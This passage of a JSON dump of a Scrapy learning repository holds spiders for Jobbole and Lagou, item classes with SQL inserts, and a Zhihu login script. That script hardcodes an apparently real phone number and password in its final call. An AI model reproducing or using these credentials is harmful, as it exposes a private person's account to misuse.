self.post_date_bing['from'] = 'zh-CHS'\n self.post_date_bing['to'] = 'en'\n self.url_bing = self.url_bing + 'en'\n else:\n self.post_date_bing['from'] = 'en'\n self.post_date_bing['to'] = 'zh-CHS'\n self.url_bing = self.url_bing + 'zh-CHS'\n # self.post_date_bing['items'][0]['text'] = query\n response = requests.post(self.url_bing, self.post_date_bing, self.post_json_bing, headers=self.header)\n response = response.content.decode()\n dict_response = json.loads(response)\n return dict_response['trans_result']['data'][0]['dst']\n\n def check_cn(self, str):\n for ch in str:\n if u'\\u4e00' <= ch <= u'\\u9fff':\n return True\n return False\n\n\nif __name__ == '__main__':\n # print(BaiduTranslate('red', None).run())\n try:\n query = sys.argv[1]\n except:\n print('请输入要翻译的内容或文件')\n exit()\n try:\n outfile = sys.argv[2]\n if not outfile.endswith('.txt'):\n outfile = None\n except:\n outfile = None\n\n print(BaiduTranslate(query, outfile).run())\n\n"
},
{
"alpha_fraction": 0.6264986395835876,
"alphanum_fraction": 0.6277220249176025,
"avg_line_length": 33.344539642333984,
"blob_id": "fd1b946ce144f46b85d6b2484e8311a11d128473",
"content_id": "f22774218bee11979e7ebb23fa4a0fdfbfd06fa4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8648,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 238,
"path": "/ArticleSpider/items.py",
"repo_name": "sunzhongyuan/ArticleSpider",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\n# Define here the models for your scraped items\n#\n# See documentation in:\n# http://doc.scrapy.org/en/latest/topics/items.html\n\nimport scrapy\nfrom scrapy.loader.processors import MapCompose # scrapy默认提供的input_processor,可以传递任意多的函数作为参数\nfrom scrapy.loader.processors import TakeFirst # scrapy提供的函数,作用是取数组的第一个\nfrom scrapy.loader.processors import Join # scrapy提供的函数,作用是将数组按照分隔符拼接成一个字符串\nfrom scrapy.loader import ItemLoader # 可以重载这个类,自定义output_processor\nimport datetime\nimport time\nimport re\nfrom ArticleSpider.utils.common import extract_num # 公共的从字符串中提取数字\nfrom ArticleSpider.settings import SQL_DATE_FORMAT, SQL_DATETIME_FORMAT # 自定义的日期格式,用于格式化日期\nfrom w3lib.html import remove_tags\n\n\nclass ArticlespiderItem(scrapy.Item):\n # define the fields for your item here like:\n # name = scrapy.Field()\n pass\n\n\n# 演示用\ndef add_name(value):\n return value + '-zyzy'\n\n\n# 将字符串转换为时间类型\ndef date_convert(value):\n try:\n create_date = datetime.datetime.strptime(value, '%Y/%m/%d').date()\n except Exception as e:\n create_date = datetime.datetime.now().date()\n return create_date\n\n\n# 从字符串中获取数字\ndef get_nums(value):\n match_re = re.match('.*?(\\d+).*', value)\n if match_re:\n nums = int(match_re.group(1))\n else:\n nums = 0\n return nums\n\n\n# 去掉不符合规则的value,数组中每个值进行处理\ndef remove_comment_tags(value):\n if '评论' in value:\n return ''\n else:\n return value\n\n\n# 空方法,用于覆盖默认的output_processor的方法\ndef return_value(value):\n return value\n\n\n# 重载ItemLoader\nclass ArticleItemLoader(ItemLoader):\n default_output_processor = TakeFirst()\n\n\nclass JobBoleArticleItem(scrapy.Item):\n title = scrapy.Field(\n # 有两个参数,input_processor:当值传递进来当时候可以进行预处理;output_processor:当值传出时调用\n input_processor=MapCompose(lambda x: x+'-jobbole', add_name)\n )\n create_date = scrapy.Field(\n input_processor=MapCompose(date_convert)\n )\n url = scrapy.Field()\n url_object_id = scrapy.Field()\n front_image_url = scrapy.Field(\n output_processor=MapCompose(return_value) # front_image_url需要下载图片的URL,需要一个数组类型\n )\n front_image_path = scrapy.Field()\n praise_nums = scrapy.Field(\n input_processor=MapCompose(get_nums)\n )\n comment_nums = scrapy.Field(\n input_processor=MapCompose(get_nums)\n )\n fav_nums = scrapy.Field(\n input_processor=MapCompose(get_nums)\n )\n tags = scrapy.Field(\n input_processor=MapCompose(remove_comment_tags),\n output_processor=Join(',')\n )\n content = scrapy.Field()\n\n def get_insert_sql(self):\n insert_sql = '''\n insert into article(title, url, url_object_id, create_date, fav_nums)\n values (%s, %s, %s, %s, %s)\n '''\n params = (self['title'], self['url'], self['url_object_id'], self['create_date'], self['fav_nums'])\n\n return insert_sql, params\n\n\nclass ZhihuQuestionItem(scrapy.Item):\n zhihu_id = scrapy.Field()\n topics = scrapy.Field()\n url = scrapy.Field()\n title = scrapy.Field()\n content = scrapy.Field()\n answer_num = scrapy.Field()\n comments_num = scrapy.Field()\n watch_user_num = scrapy.Field()\n click_num = scrapy.Field()\n crawl_time = scrapy.Field()\n\n def get_insert_sql(self):\n insert_sql = '''\n insert into zhihu_question(zhihu_id, topics, url, title, content, answer_num, comments_num, watch_user_num, \n click_num, crawl_time) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s) \n on duplicate key UPDATE content=VALUES(content), answer_num=VALUES(answer_num), \n comments_num=VALUES(comments_num), watch_user_num=VALUES(watch_user_num), click_num=VALUES(click_num),\n crawl_update_time=VALUES(crawl_time)\n '''\n\n # 这个item是用ItemLoader加载的item,每一项都是list,可以像JobBoleArticleItem那样处理\n # 也可以自己手动处理\n zhihu_id = self['zhihu_id'][0]\n topics = ','.join(self['topics'])\n url = self['url'][0]\n title = self['title'][0]\n content = self['content'][0]\n answer_num = extract_num((''.join(self['answer_num']).replace(',', '')))\n comments_num = extract_num((''.join(self['comments_num']).replace(',', '')))\n watch_user_num = extract_num(self['watch_user_num'][0].replace(',', ''))\n click_num = extract_num(self['click_num'][1].replace(',', ''))\n crawl_time = datetime.datetime.now().strftime(SQL_DATETIME_FORMAT)\n\n params = (zhihu_id, topics, url, title, content, answer_num, comments_num, watch_user_num,\n click_num, crawl_time)\n\n return insert_sql, params\n\n\nclass ZhihuAnswerItem(scrapy.Item):\n zhihu_id = scrapy.Field()\n url = scrapy.Field()\n question_id = scrapy.Field()\n author_id = scrapy.Field()\n content = scrapy.Field()\n praise_num = scrapy.Field()\n comments_num = scrapy.Field()\n create_time = scrapy.Field()\n update_time = scrapy.Field()\n crawl_time = scrapy.Field()\n\n def get_insert_sql(self):\n insert_sql = '''\n insert into zhihu_answer(zhihuid, url, question_id, author_id, content, praise_num, comments_num, \n create_time, update_time, crawl_time) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\n on duplicate KEY UPDATE content=VALUES(content), praise_num=VALUES(praise_num), \n comments_num=VALUES(comments_num), update_time=VALUES(update_time), crawl_update_time=VALUES(crawl_time)\n '''\n\n create_time = time.strftime(SQL_DATETIME_FORMAT, time.localtime(self['create_time']))\n update_time = time.strftime(SQL_DATETIME_FORMAT, time.localtime(self['update_time']))\n crawl_time = time.strftime(SQL_DATETIME_FORMAT, time.localtime(self['crawl_time']))\n\n params = (self['zhihu_id'], self['url'], self['question_id'], self['author_id'], self['content'],\n self['praise_num'], self['comments_num'], create_time, update_time, crawl_time)\n\n return insert_sql, params\n\n\nclass LagouJobItemLoader(ItemLoader):\n default_output_processor = TakeFirst()\n\n\ndef remove_splash(value):\n return value.replace('/', '')\n\n\ndef str_strip(value):\n return value.strip()\n\n\nclass LagouJobItem(scrapy.Item):\n url = scrapy.Field()\n url_object_url = scrapy.Field()\n title = scrapy.Field()\n salary = scrapy.Field()\n job_city = scrapy.Field(\n input_processor=MapCompose(remove_splash),\n )\n work_year = scrapy.Field(\n input_processor=MapCompose(remove_splash),\n )\n degree_need = scrapy.Field(\n input_processor=MapCompose(remove_splash),\n )\n job_type = scrapy.Field()\n publish_time = scrapy.Field()\n tags = scrapy.Field(\n output_processor=Join(',')\n )\n job_advantage = scrapy.Field()\n job_desc = scrapy.Field(\n input_processor=MapCompose(remove_tags),\n )\n job_addr = scrapy.Field(\n input_processor=MapCompose(str_strip),\n output_processor=Join('')\n )\n company_url = scrapy.Field()\n company_name = scrapy.Field()\n crawl_time = scrapy.Field()\n crawl_update_time = scrapy.Field()\n\n def get_insert_sql(self):\n insert_sql = '''\n insert into lagou_job(url, url_object_url, title, salary, job_city, work_year, degree_need, \n job_type, publish_time, tags, job_advantage, job_desc, job_addr, company_url, company_name, crawl_time) \n VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\n on duplicate KEY UPDATE salary=VALUES(salary), job_city=VALUES(job_city), work_year=VALUES(work_year),\n degree_need=VALUES(degree_need), publish_time=VALUES(publish_time), crawl_update_time=VALUES(crawl_time)\n '''\n\n crawl_time = self['crawl_time'].strftime(SQL_DATETIME_FORMAT)\n\n params = (self['url'], self['url_object_url'], self['title'], self['salary'], self['job_city'],\n self['work_year'], self['degree_need'], self['job_type'], self['publish_time'], self['tags'],\n self['job_advantage'], self['job_desc'], self['job_addr'], self['company_url'], self['company_name'],\n crawl_time)\n\n return insert_sql, params\n"
},
{
"alpha_fraction": 0.6271941065788269,
"alphanum_fraction": 0.655750572681427,
"avg_line_length": 29.535999298095703,
"blob_id": "cb22b7402530896c2adae5936d4ae9ae3789b403",
"content_id": "001f552605b5b146e1aa5fc9548104de95546f52",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4871,
"license_type": "no_license",
"max_line_length": 130,
"num_lines": 125,
"path": "/ArticleSpider/utils/zhihu_login_requests.py",
"repo_name": "sunzhongyuan/ArticleSpider",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n__author__ = 'zyzy'\n\n'''\n requests模拟登陆知乎,包括使用cookie自动登陆\n'''\n\nimport requests # requsets模块 发送请求 可百度requests文档学习\ntry:\n import cookielib # python2 cookielib相关模块\nexcept:\n import http.cookiejar as cookielib # python3 这样写可以实现python2和python3兼容\nimport re\nimport shutil #\nimport time # 时间模块,这里用于生成随机数\nfrom PIL import Image # 这里用来打开图片\n\n\n# 会话对象,能够跨请求保持某些参数,它也会在同一个 Session 实例发出的所有请求之间保持cookie\nsession = requests.session()\n\n\n# LWPCookieJar是python中管理cookie的工具,可以将cookie保存到文件,或者在文件中读取cookie数据到程序\nsession.cookies = cookielib.LWPCookieJar(filename='cookies.txt') # 调用这个的save方法可以将cookie存储到filename的文件中\ntry:\n session.cookies.load(ignore_discard=True) # 调用load读取cookie文件,ignore_discard=True忽略关闭浏览器丢失,ignore_expires=True忽略失效\nexcept:\n print('cookie未能加载')\n\n\n# 这里要自己定义一个请求的header,默认的是python的header,网站服务器会筛选是哪里发来的请求,这里模仿浏览器发送的请求\n# agent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko) Version/11.0.2 Safari/604.4.7'\nagent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36'\nheader = {\n 'HOST': 'www.zhihu.com',\n 'Referer': 'https://www.zhihu.com',\n 'User-Agent': agent\n}\n\n\n# 获取_xsrf,xsrf是服务器生成的,传递给浏览器,浏览器发送特定请求需要带着xsrf才可以请求成功,这个xsrf可以在html中隐藏域中获取\ndef get_xsrf():\n response = session.get('https://www.zhihu.com', headers=header) # 这里注意headers参数,我们要自定义header,模拟浏览器\n # response.text 是服务器返回的html页面,其中就有xsrf,<input type=\"hidden\" name=\"_xsrf\" value=\"5903a96c29735c6a0eb8e3bd99d15ee0\"/>\n # 我们可以用正则将xsrf匹配出来,因为match只能匹配单行,有换行符就无法成功匹配,所以这里用search\n # 也可以用match,match有一个参数re.DOTALL(或re.S)使得 . 匹配包括换行符在内的任意字符\n match_obj = re.search('.*xsrf.*value=\"(.*?)\"', response.text)\n if match_obj:\n print(match_obj.group(1))\n return match_obj.group(1)\n else:\n return ''\n\n\n# 验证码模块,获取验证码图片\ndef get_captcha():\n t = str(int(time.time()*1000))\n captcha_url = 'https://www.zhihu.com/captcha.gif?r={0}&type=login'.format(t)\n # 这里要用session请求,session会保存cookie,保证验证码是当前登陆会话的,\n # 不能用request,request请求回来的是不同会话的,验证码无法校验成功\n t = session.get(captcha_url, headers=header)\n with open('captcha.jpg', 'wb') as f:\n f.write(t.content)\n\n # 显示图片\n im = Image.open('captcha.jpg')\n im.show()\n im.close()\n\n # 在console输入图片中的验证码\n captcha = input('输入验证码\\n')\n return captcha\n\n\ndef zhihu_login(account, password):\n if re.match('^1\\d{10}', account):\n print('手机号码登陆')\n post_url = \"https://www.zhihu.com/login/phone_num\"\n post_data = {\n '_xsrf': get_xsrf(),\n 'phone_num': account,\n 'password': password,\n 'captcha': get_captcha()\n # 'captcha_type': 'cn'\n }\n elif '@' in account:\n print('邮箱登陆')\n post_url = \"https://www.zhihu.com/login/email\"\n post_data = {\n '_xsrf': get_xsrf(),\n 'email': account,\n 'password': password\n # 'captcha_type': 'cn'\n }\n response_text = session.post(post_url, post_data, headers=header)\n print(response_text.text)\n session.cookies.save() # 保存cookie信息到本地\n\n\n# 获取主页\ndef get_index():\n response = session.get('https://www.zhihu.com', headers=header)\n with open('index_page.html', 'wb') as f:\n f.write(response.text.encode('utf-8'))\n print('ok')\n\n\n# 判断是否登陆\ndef is_login():\n inbox_url = 'https://www.zhihu.com/inbox' # 私信页面\n # allow_redirects=False是否重定向为False,否则302会重定向到登陆界面,返回码变成200,无法判断是否是登陆状态\n response = session.get(inbox_url, headers=header, allow_redirects=False)\n if response.status_code != 200:\n print('未登录')\n return False\n else:\n print('已登录')\n return True\n\n\nzhihu_login('15522523676', 'sun112788')\n# get_index()\n# is_login()\n# get_xsrf()\n# get_captcha()\n"
},
{
"alpha_fraction": 0.585383415222168,
"alphanum_fraction": 0.5931520462036133,
"avg_line_length": 42.431251525878906,
"blob_id": "b51f67142ad3432c4fed28b6cdbd6d39b6849883",
"content_id": "cc14da43e2d5bd80e18e4ca0f8d7cc2a62ed387b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9304,
"license_type": "no_license",
"max_line_length": 126,
"num_lines": 160,
"path": "/ArticleSpider/spiders/jobbole.py",
"repo_name": "sunzhongyuan/ArticleSpider",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nimport scrapy\nimport re\nimport datetime\nfrom scrapy.http import Request # 用于发送请求\nfrom urllib import parse # parse.urljoin(response.url, post_url) 用于拼接URL,如果post_url没有域名,则提取response.url的URL\nfrom ArticleSpider.items import JobBoleArticleItem, ArticleItemLoader # ArticleItemLoader为重载的ItemLoader,自定义类output_processor\nfrom ArticleSpider.utils import common\nfrom scrapy.loader import ItemLoader # ItemLoader是scrapy提供的加载item的模块,ItemLoader可以自定义一些规则,然后根据这些规则解析生成item\n\n\nclass JobboleSpider(scrapy.Spider):\n name = 'jobbole'\n allowed_domains = ['blog.jobbole.com']\n start_urls = ['http://blog.jobbole.com/all-posts/'] # 所有文章页面作为入口页面\n\n def parse(self, response):\n \"\"\"\n 这个函数是由start_requests函数调起的,start_requests是spider的入口函数\n start_requests函数会逐条发送start_urls这个数组里的url请求,默认的callback函数就是这个parse函数\n response是请求返回的内容\n :param response:\n :return:\n \"\"\"\n\n # 已经获取到了全部文章页面的response,我们从这个页面解析出所有具体文章的链接,\n # 再发送这个链接请求,就可以获取到文章页面的response,\n # 从文章页面的response就可以解析出文章相关内容,然后保存到数据库\n\n # css选择器,一层一层的获取,从前往后,最外层到最内层具体要爬取的内容\n # #archive id为archive的div\n # .floated-thumb class包含floated-thumb的div\n # .post-thumb class包含post-thumb的div\n # a 所有的a标签\n # 获取到这里没有进行extract啥也看不出来,不进行extract是因为既要提取出当前层a的链接地址,还要提取出下一层的img的src\n post_nodes = response.css(\"#archive .floated-thumb .post-thumb a\")\n for post_node in post_nodes:\n # 逐条再次解析\n # 获取下层img标签的src属性值\n img_url = post_node.css('img::attr(src)').extract_first('')\n # 获取当前层a标签的href属性值\n post_url = post_node.css('::attr(href)').extract_first('')\n # 想要爬取的文件链接取出来来,下面异步请求这个页面,返回的内容response在callback函数内爬取并存储到数据库\n # 参数说明: url是发送的请求;\n # parse.urljoin这个函数可以智能拼接URL\n # 如获取到的文章链接是/113367/,调用这个函数会将两个url拼接在一起,变成http://blog.jobbole.com/113367/\n # 如获取到的文章链接是http://blog.jobbole.com/113367/,就不会拼接了\n # callback是处理这个请求的函数名,异步处理的;\n # meta是我们自定义的加到request里的字段,在处理函数中从response中获取,meta是个字典\n yield Request(url=parse.urljoin(response.url, post_url), meta={'front_image_url': img_url},\n callback=self.parse_detail)\n\n # 提取下一页URL\n # 当前页能提取到的文章url都爬取完了之后,需要爬取下一页的文章url\n # 这里我们需要模拟点击下一页,也就是发送一个下一页链接请求,将点击后返回的response交给callback函数处理,\n # 这个的callback函数是当前函数,也就是一个循环,直到无法获取下一页的url为止\n next_urls = response.css('.next.page-numbers::attr(href)').extract_first('')\n if next_urls:\n yield Request(url=parse.urljoin(response.url, next_urls), callback=self.parse)\n\n def parse_detail(self, response):\n \"\"\"\n 这个函数用来解析具体的文章页,response就是点击文章链接后返回的文章页面内容,我们需要处理的\n \"\"\"\n\n # 提取的内容需要存放到数据库,这个对象是和数据库表对应的一个对象,scrapy叫它item\n article_item = JobBoleArticleItem()\n\n # ———————————第一种生成item的方法:逐个获取,然后处理数据,最后放在item里(item因为第二种方法已经改动了)———————————————\n\n # 获取自定义的字段,从meta中获取\n front_image_url = response.meta.get('front_image_url', '')\n\n # 使用xpath获取字段\n # title = response.xpath('//*[@id=\"post-112886\"]/div[1]/h1/text()').extract()[0]\n # vote = int(response.xpath('//span[contains(@class, \"vote-post-up\")]/h10/text()').extract()[0])\n\n # 使用css选择器提取字段\n\n # 获取标题\n title2 = response.css('div.entry-header > h1::text').extract_first('')\n\n # 获取创建日期\n create_date = response.css('p.entry-meta-hide-on-mobile::text').extract()[0].strip().replace('·', '').strip()\n\n # 获取点赞数\n praise_nums = int(response.css('span.vote-post-up > h10::text').extract()[0])\n\n # 获取收藏数\n fav_nums = response.css('span.bookmark-btn::text').extract()[0].strip()\n match_re = re.match('.*?(\\d+).*', fav_nums)\n if match_re:\n fav_nums = int(match_re.group(1))\n else:\n fav_nums = 0\n\n # 获取评论数\n comment_nums = response.css('a[href=\"#article-comment\"] > span::text').extract()[0].strip()\n match_re = re.match('.*?(\\d+).*', comment_nums)\n if match_re:\n comment_nums = int(match_re.group(1))\n else:\n comment_nums = 0\n\n # 获取文章内容\n content = response.css('div.entry').extract()[0]\n\n # 获取标签\n tags = response.css('p.entry-meta-hide-on-mobile a::text').extract()\n tag_list = [tag for tag in tags if not tag.strip().endswith('评论')]\n tags = ','.join(tag_list)\n\n article_item['title'] = title2\n try:\n create_date = datetime.datetime.strptime(create_date, '%Y/%m/%d').date()\n except Exception as e:\n create_date = datetime.datetime.now().date()\n article_item['create_date'] = create_date\n article_item['url'] = response.url\n article_item['url_object_id'] = common.get_md5(response.url)\n article_item['front_image_url'] = [front_image_url]\n article_item['praise_nums'] = praise_nums\n article_item['comment_nums'] = comment_nums\n article_item['fav_nums'] = fav_nums\n article_item['tags'] = tags\n article_item['content'] = content\n\n # ——————————————————————————————————————————————————————————————————————————————————————————————————————————————\n # ———————第二种加载item的方法:通过itemloader加载item,好处是数据的处理统一放到了item类中去处理,减少代码量,增强可读性————\n # ——————————————————————————————————————————————————————————————————————————————————————————————————————————————\n '''\n 思路:\n 1,创建一个ItemLoad对象 \n 2,通过该对象的add_css或者add_xpath或者add_value方法将解析语句装入ItemLoader\n 3,在Item.py中在Filder()中调用函数,用来清洗,处理数据\n 4,artical_item = item_loader.load_item() 调用这个对象的此方法,写入到Item中\n '''\n # item_loader = ItemLoader(item=JobBoleArticleItem(), response=response)\n item_loader = ArticleItemLoader(item=JobBoleArticleItem(), response=response) # 自定义的itemloader\n '''\n ItemLoader重要的方法有下面这三个\n item_loader.add_css()\n item_loader.add_xpath()\n item_loader.add_value()\n '''\n item_loader.add_css('title', 'div.entry-header > h1::text')\n item_loader.add_css('create_date', 'p.entry-meta-hide-on-mobile::text')\n item_loader.add_value('url', response.url)\n item_loader.add_value('url_object_id', common.get_md5(response.url))\n item_loader.add_value('front_image_url', [front_image_url])\n item_loader.add_css('praise_nums', 'span.vote-post-up > h10::text')\n item_loader.add_css('comment_nums', 'a[href=\"#article-comment\"] > span::text')\n item_loader.add_css('fav_nums', 'span.bookmark-btn::text')\n item_loader.add_css('tags', 'p.entry-meta-hide-on-mobile a::text')\n item_loader.add_css('content', 'div.entry')\n\n # 添加以上这些规则后需要调用一个load_item方法,将这些规则解析成item\n article_item = item_loader.load_item()\n\n yield article_item\n\n\n"
},
{
"alpha_fraction": 0.8399999737739563,
"alphanum_fraction": 0.8399999737739563,
"avg_line_length": 11.5,
"blob_id": "12d1cbf2c1927d8fa8290836a249a5ddf9e7e204",
"content_id": "87b85bb587f2094134e76065e07855f0b6dc7868",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 29,
"license_type": "no_license",
"max_line_length": 15,
"num_lines": 2,
"path": "/README.md",
"repo_name": "sunzhongyuan/ArticleSpider",
"src_encoding": "UTF-8",
"text": "# ArticleSpider\n学习scrapy\n"
},
{
"alpha_fraction": 0.4680851101875305,
"alphanum_fraction": 0.5106382966041565,
"avg_line_length": 30,
"blob_id": "55fd07d9415075571a9af037fc6412c33a9b4836",
"content_id": "14ab004aa45b243bb8b859ec506f65fe71c55cb7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 94,
"license_type": "no_license",
"max_line_length": 30,
"num_lines": 3,
"path": "/ArticleSpider/utils/yuc.py",
"repo_name": "sunzhongyuan/ArticleSpider",
"src_encoding": "UTF-8",
"text": "\nwith open('aa.txt', 'w') as f:\n for each in range(1, 101):\n f.write(str(each)+',')\n"
},
{
"alpha_fraction": 0.625685453414917,
"alphanum_fraction": 0.6314574480056763,
"avg_line_length": 55.803279876708984,
"blob_id": "ccd4366eebd9257fc3db0051362c748f3fbf4f51",
"content_id": "08ed88b9bc9b4ea84739f29242ea21a34c80b343",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9442,
"license_type": "no_license",
"max_line_length": 262,
"num_lines": 122,
"path": "/ArticleSpider/spiders/lagou.py",
"repo_name": "sunzhongyuan/ArticleSpider",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nimport scrapy\nfrom scrapy.linkextractors import LinkExtractor\nfrom scrapy.spiders import CrawlSpider, Rule\nfrom scrapy.loader import ItemLoader\nfrom items import LagouJobItem, LagouJobItemLoader\nfrom utils.common import get_md5\nimport datetime\n\n\nclass LagouSpider(CrawlSpider):\n name = 'lagou'\n allowed_domains = ['www.lagou.com']\n start_urls = ['https://www.lagou.com/']\n\n '''\n CrawlSpider基于Spider,相比普通的Spider它可以智能提取页面中的所有的链接,并且下载这些页面,供我们解析处理\n 我们只需要写一个规则,说明什么样的链接做什么样的处理就可以了,\n 在规则中我们可以指定某个callback函数对某一类链接对处理,不指定callback函数默认操作是提取当前页面对链接并下载\n 当然是否提取链接还是由规则中的follow参数决定,True就提取,False不提取\n 没有指定follow参数时,follow参数的默认值由是否指定callback函数决定,\n 有callback就False,无callback就True(源码这么写的:self.follow = False if callback else True)\n 关于的CrawlSpider流程:\n 1。还是先执行start_requests对start_urls里对每一个URL发起请求\n 2。请求回来的response被默认的parse方法接收处理,parse方法CrawlSpider已经定义好了,我们不可以重写覆盖\n 3。定义好的parse做了如下处理:\n return self._parse_response(response, self.parse_start_url, cb_kwargs={}, follow=True)\n 调用了CrawlSpider的一个核心方法_parse_response,其中参数parse_start_url是一个callback函数,它是CrawlSpider预先定义的一个空方法\n 我们可以重写这个方法来处理response,也可以不重写继续执行CrawlSpider为我们提供的功能\n _parse_response方法是CrawlSpider的核心,会被多次调用,这里只是为了代码复用而调用了一次\n 4。_parse_response方法:def _parse_response(self, response, callback, cb_kwargs, follow=True):\n a。先判断是否有callback函数,没有则跳过这步\n 调用callback方法处理response,处理的结果再传到process_results方法进一步处理\n process_results是CrawlSpider提供的一个空方法,我们可以根据自己的需求决定是否重写这个方法\n b。判断是否继续从response里提取url,\n 是否提取由两个参数共同决定,一个是传入的follow参数,另一个是setting文件中CRAWLSPIDER_FOLLOW_LINKS的值,True or False,\n 调用_requests_to_follow方法做后续提取等主要操作\n 5。_requests_to_follow方法:def _requests_to_follow(self, response):\n 这个方法里就用到了我们自定义的提取url的规则\n 规则如何定义:\n 通过定义CrawlSpider对象的rules属性,它是规则类Rule的一个集合,可以写多个Rule类放在里面,一个Rule就是一个规则\n rules = (\n Rule(LinkExtractor(allow='zhaopin/.*'), follow=True),\n Rule(LinkExtractor(allow='jobs/\\d+.html'), callback='parse_job', follow=True),\n )\n Rule类有这些参数(link_extractor, callback=None, cb_kwargs=None, follow=None, process_links=None, process_request=identity)\n link_extractor:是一个LinkExtractor类,它定义了需要提取的URL的规则\n LinkExtractor类有这些参数(allow=(), deny=(), allow_domains=(), deny_domains=(), restrict_xpaths=(), tags=('a', 'area'), attrs=('href',), canonicalize=False, unique=True, process_value=None, deny_extensions=None, restrict_css=(), strip=True)\n 很多参数,但是大部分不需要我们指定,都默认即可,这里说明几个常用参数:\n allow:这个是正则表达式字符串,也可以是正则表达式字符串的元祖,满足的值会被提取,如果为空,则全部匹配。\n deny:与allow相反,满足的不会被提取\n allow_domains:会被提取的链接的domains\n deny_domains:一定不会被提取链接的domains\n restrict_xpaths:使用xpath表达式,和allow共同作用过滤链接,比如只提取正文内的链接,可以在这里选择正文部分\n restrict_css:使用css选择器,和restrict_xpaths作用一样\n callback:符合规则的页面下载回来后用哪个函数处理,不传不处理,这里需要传字符串\n cb_kwargs:自定义的参数,会作为参数传入到callback函数里\n follow:是否继续获取当前页面的链接\n 上面这三个参数后续会作为参数传入_parse_response函数处理\n process_links:需要传入一个自定义方法的名称的字符串,在_requests_to_follow方法中被调用,发送请求之前调用,多用于URL的再加工\n process_request:需要传入一个自定义方法名称的字符串,根据url创建request类后,这个request会作为参数传入这个方法,多用来处理request类\n 注意callback,process_links,process_request这三个参数需要传入方法名称的字符串,\n 不能传入方法名称,CrawlSpider在初始化时会调用_compile_rules方法,这个方法将rules浅拷贝为_rules,同时将这三个字符串转换为方法,具体怎么转的看源码\n 以上就是关于规则的定义方法,以及CrawlSpider如何获取这些rules\n process_request会逐个处理这些Rule\n a。首先根据LinkExtractor类定义的URL规则提取出页面中的URL\n b。然后有一个去重操作,对当前页面的URL进行去重\n c。如果自定义了process_links方法,则调用process_links方法处理url\n d。接着调用_build_request方法,这个方法用来构建一个request,并返回这个request\n e。返回的request会被process_request函数处理,如果定义了process_request函数的话\n f。process_request函数必须返回一个request或None\n g。最后本方法yield出去这个request或者None,yield出去这个request的callback是_response_downloaded方法\n h。_response_downloaded方法\n 会将这个response和rule规则里的callback、cb_kwargs、follow这个四个作为参数调用_parse_response方法\n i。又回到了_parse_response方法\n \n 总结一下可以让我重构的方法:\n parse_start_url\n process_results\n process_links\n process_request\n '''\n\n # 这个是spider类的一个属性,可以自定义setting文件的配置,也可以在setting文件里直接配置\n custom_settings = {\n \"COOKIES_ENABLED\": False,\n \"DOWNLOAD_DELAY\": 1,\n # 'DEFAULT_REQUEST_HEADERS': {\n # 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36'\n # }\n }\n\n rules = (\n # Rule(LinkExtractor(allow='zhaopin/.*'), follow=True),\n # Rule(LinkExtractor(allow='gongsi/.*'), follow=True),\n Rule(LinkExtractor(allow='jobs/\\d+.html'), callback='parse_job', follow=True),\n )\n\n def parse_job(self, response):\n item_loader = LagouJobItemLoader(LagouJobItem(), response)\n item_loader.add_value('url', response.url)\n item_loader.add_value('url_object_url', get_md5(response.url))\n item_loader.add_css('title', '.job-name::attr(title)')\n item_loader.add_css('salary', '.job_request span.salary::text')\n item_loader.add_css('job_city', '.job_request span:nth-child(2)::text')\n # xpath选择第二个这么写\n # item_loader.add_xpath('job_city', '//*[@class=\"job_request\"]/p/span[2]/text()')\n item_loader.add_css('work_year', '.job_request span:nth-child(3)::text')\n item_loader.add_css('degree_need', '.job_request span:nth-child(4)::text')\n item_loader.add_css('job_type', '.job_request span:nth-child(5)::text')\n item_loader.add_css('publish_time', '.publish_time::text')\n item_loader.add_css('tags', '.position-label li::text')\n item_loader.add_css('job_advantage', '.job-advantage p::text')\n item_loader.add_css('job_desc', '.job_bt div')\n item_loader.add_css('job_addr', '.work_addr a:not(#mapPreview)::text, .work_addr::text')\n # item_loader.add_css('job_addr', '.work_addr')\n item_loader.add_css('company_url', '.job_company dt a::attr(href)')\n item_loader.add_css('company_name', '.job_company dt a img::attr(alt)')\n item_loader.add_value('crawl_time', datetime.datetime.now())\n\n job_item = item_loader.load_item()\n return job_item\n"
}
] | 13 |
dmeiburg/softlab
|
https://github.com/dmeiburg/softlab
|
a4730e42601dfeb25fc97120299dbbe246f87694
|
5d9e780a49590d09022abc7360d60d0ce2627521
|
54073a7e4f37d274b229c04cac420a563a35fbea
|
refs/heads/master
| 2021-03-02T07:13:02.295329 | 2020-03-09T00:31:31 | 2020-03-09T00:31:31 | 245,846,255 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5609756112098694,
"alphanum_fraction": 0.5698447823524475,
"avg_line_length": 22.736841201782227,
"blob_id": "4e152c472d1149c7824c4366c7a7250ecb8b2a23",
"content_id": "b74990a1c35da84eac8808010c8cec28c4fb90dd",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 902,
"license_type": "permissive",
"max_line_length": 75,
"num_lines": 38,
"path": "/softlab/sdg_function_generator.py",
